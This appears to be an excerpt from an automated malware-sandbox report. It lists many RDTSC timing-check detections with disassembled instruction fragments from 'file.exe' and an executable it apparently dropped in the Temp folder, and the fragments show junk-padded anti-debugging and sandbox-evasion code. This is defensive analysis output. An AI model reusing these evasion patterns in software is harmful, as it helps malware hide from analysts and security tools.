Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B3A second address: 49A0B40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B40 second address: 49A0B58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f movsx edx, si 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B58 second address: 49A0B65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov esi, 2B64A709h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B65 second address: 49A0B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B69 second address: 49A0BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F60A4BE8BE2h 0x0000000d mov ebp, esp 0x0000000f jmp 00007F60A4BE8BE0h 0x00000014 cmp dword ptr [769B459Ch], 05h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F60A4BE8BDDh 0x00000024 sbb esi, 33475FF6h 0x0000002a jmp 00007F60A4BE8BE1h 0x0000002f popfd 0x00000030 call 00007F60A4BE8BE0h 0x00000035 pop ecx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0BD7 second address: 49A0BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0BDC second address: 49A0C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F60A4BE8BDCh 0x0000000a or ax, 3848h 0x0000000f jmp 00007F60A4BE8BDBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 je 00007F6116B969D4h 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F60A4BE8BE4h 0x00000025 jmp 00007F60A4BE8BE5h 0x0000002a popfd 0x0000002b push ecx 0x0000002c mov cx, dx 0x0000002f pop edx 0x00000030 popad 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0C40 second address: 49A0C5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0CD5 second address: 49A0D98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F60A4BE8BE8h 0x00000009 jmp 00007F60A4BE8BE5h 0x0000000e popfd 0x0000000f mov cx, 03E7h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F60A4BE8BE3h 0x00000021 adc ecx, 1A98A02Eh 0x00000027 jmp 00007F60A4BE8BE9h 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F60A4BE8BE0h 0x00000033 or ch, FFFFFFA8h 0x00000036 jmp 00007F60A4BE8BDBh 0x0000003b popfd 0x0000003c popad 0x0000003d mov eax, dword ptr [eax] 0x0000003f jmp 00007F60A4BE8BE9h 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b jmp 00007F60A4BE8BDAh 0x00000050 movzx ecx, dx 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0D98 second address: 49A0D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0D9E second address: 49A0DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0DA2 second address: 49A0DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F60A4E98F00h 0x00000010 adc ah, FFFFFF98h 0x00000013 jmp 00007F60A4E98EFBh 0x00000018 popfd 0x00000019 push ecx 0x0000001a call 00007F60A4E98EFFh 0x0000001f pop eax 0x00000020 pop edx 0x00000021 popad 0x00000022 call 00007F6116E4DC89h 0x00000027 push 76952B70h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov eax, dword ptr [esp+10h] 0x00000037 mov dword ptr [esp+10h], ebp 0x0000003b lea ebp, dword ptr [esp+10h] 0x0000003f sub esp, eax 0x00000041 push ebx 0x00000042 push esi 0x00000043 push edi 0x00000044 mov eax, dword ptr [769B4538h] 0x00000049 xor dword ptr [ebp-04h], eax 0x0000004c xor eax, ebp 0x0000004e push eax 0x0000004f mov dword ptr [ebp-18h], esp 0x00000052 push dword ptr [ebp-08h] 0x00000055 mov eax, dword ptr [ebp-04h] 0x00000058 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000005f mov dword ptr [ebp-08h], eax 0x00000062 lea eax, dword ptr [ebp-10h] 0x00000065 mov dword ptr fs:[00000000h], eax 0x0000006b ret 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F60A4E98EFEh 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0DF6 second address: 49A0E05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0EAB second address: 49A0EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C03EE second address: 49C03F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C03F4 second address: 49C03F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C03F8 second address: 49C03FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C03FC second address: 49C043D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F60A4E98EFAh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov edx, ecx 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F60A4E98EFBh 0x0000001d jmp 00007F60A4E98F08h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C043D second address: 49C044F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4BE8BDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C044F second address: 49C04C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F60A4E98F07h 0x0000000e mov esi, dword ptr [ebp+0Ch] 0x00000011 pushad 0x00000012 jmp 00007F60A4E98F04h 0x00000017 mov dx, ax 0x0000001a popad 0x0000001b test esi, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F60A4E98F09h 0x00000026 or ah, 00000076h 0x00000029 jmp 00007F60A4E98F01h 0x0000002e popfd 0x0000002f mov edi, eax 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C04C2 second address: 49C0507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 56FEh 0x00000007 pushfd 0x00000008 jmp 00007F60A4BE8BDFh 0x0000000d adc al, FFFFFFAEh 0x00000010 jmp 00007F60A4BE8BE9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 je 00007F6116B76A94h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ah, bh 0x00000024 mov ebx, esi 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0507 second address: 49C0527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [769B459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0527 second address: 49C0560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6116B8EB32h 0x0000000f jmp 00007F60A4BE8BE0h 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F60A4BE8BDAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0560 second address: 49C0564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0564 second address: 49C056A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C056A second address: 49C0596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F60A4E98EFCh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F60A4E98F03h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0596 second address: 49C059C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C059C second address: 49C05A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C05A2 second address: 49C05A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C05A6 second address: 49C05E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d push eax 0x0000000e pushfd 0x0000000f jmp 00007F60A4E98EFDh 0x00000014 or eax, 0E107AC6h 0x0000001a jmp 00007F60A4E98F01h 0x0000001f popfd 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push edx 0x00000024 pop esi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0646 second address: 49C067D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007F60A4BE8BDEh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F60A4BE8BDAh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C067D second address: 49C0681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0681 second address: 49C0687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0687 second address: 49C068D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C068D second address: 49C0691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0691 second address: 49C0695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 6FBE0C second address: 6FBE1A instructions: 0x00000000 rdtsc 0x00000002 je 00007F60A4BE8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 6FBE1A second address: 6FBE1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 6FBE1E second address: 6FBE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70CBF3 second address: 70CC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F60A4E98EF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70CE9D second address: 70CECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F60A4BE8BE5h 0x0000000b jl 00007F60A4BE8BD6h 0x00000011 popad 0x00000012 pop eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F60A4BE8BDBh 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70D414 second address: 70D41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70D41B second address: 70D420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70D420 second address: 70D43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F04h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70EF6A second address: 70EF6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70EF6E second address: 70EF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70EF74 second address: 70EF79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70EF79 second address: 70EF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60A4E98EFFh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F038 second address: 70F03F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F03F second address: 70F045 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F045 second address: 70F049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F049 second address: 70F07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F60A4E98F01h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F60A4E98F05h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F07E second address: 70F088 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F60A4BE8BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F088 second address: 70F095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F095 second address: 70F099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F099 second address: 70F09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F09D second address: 70F144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60A4BE8BDAh 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007F60A4BE8BE2h 0x00000015 pop eax 0x00000016 pushad 0x00000017 jng 00007F60A4BE8BD8h 0x0000001d mov edx, ebx 0x0000001f and edx, 04A4517Bh 0x00000025 popad 0x00000026 push 00000003h 0x00000028 mov edx, 26BED800h 0x0000002d push 00000000h 0x0000002f pushad 0x00000030 mov esi, edi 0x00000032 call 00007F60A4BE8BE7h 0x00000037 push edi 0x00000038 pop esi 0x00000039 pop ebx 0x0000003a popad 0x0000003b push 00000003h 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007F60A4BE8BD8h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 00000015h 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 jmp 00007F60A4BE8BE4h 0x0000005c or dword ptr [ebp+122D22F4h], eax 0x00000062 push 7D23B3A1h 0x00000067 push eax 0x00000068 push edx 0x00000069 jng 00007F60A4BE8BD8h 0x0000006f rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F144 second address: 70F149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F149 second address: 70F18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 42DC4C5Fh 0x00000010 and esi, 4CE17B4Bh 0x00000016 lea ebx, dword ptr [ebp+12444E66h] 0x0000001c call 00007F60A4BE8BE9h 0x00000021 adc cx, 3208h 0x00000026 pop edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jl 00007F60A4BE8BDCh 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F226 second address: 70F29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 add dword ptr [esp], 067178B3h 0x0000000d sbb dh, 00000012h 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F60A4E98EF8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c or dword ptr [ebp+122D2401h], ecx 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D2401h], ebx 0x0000003a push 00000003h 0x0000003c mov edi, dword ptr [ebp+122D2B9Ch] 0x00000042 push AD317768h 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007F60A4E98F00h 0x0000004f jmp 00007F60A4E98F05h 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F29F second address: 70F2EA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60A4BE8BD8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 12CE8898h 0x00000013 mov dword ptr [ebp+122D23D6h], ebx 0x00000019 lea ebx, dword ptr [ebp+12444E6Fh] 0x0000001f clc 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F60A4BE8BE1h 0x00000026 push eax 0x00000027 pushad 0x00000028 pushad 0x00000029 ja 00007F60A4BE8BD6h 0x0000002f jmp 00007F60A4BE8BDCh 0x00000034 popad 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F2EA second address: 70F2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F3C1 second address: 70F3D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F60A4BE8BDDh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F3D6 second address: 70F461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 73F8F1EEh 0x00000011 stc 0x00000012 xor dword ptr [ebp+122D38DAh], edx 0x00000018 push 00000003h 0x0000001a mov dword ptr [ebp+122D3093h], edx 0x00000020 mov edi, eax 0x00000022 push 00000000h 0x00000024 mov ch, 40h 0x00000026 push 00000003h 0x00000028 push 51D3848Ah 0x0000002d jmp 00007F60A4E98F06h 0x00000032 add dword ptr [esp], 6E2C7B76h 0x00000039 jmp 00007F60A4E98F07h 0x0000003e lea ebx, dword ptr [ebp+12444E7Ah] 0x00000044 mov dx, 3A0Eh 0x00000048 xchg eax, ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F60A4E98F03h 0x00000052 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F461 second address: 70F467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F467 second address: 70F46D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 70F46D second address: 70F483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F60A4BE8BDAh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72F415 second address: 72F425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72F5BA second address: 72F5CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72F9CD second address: 72F9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72F9D7 second address: 72F9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
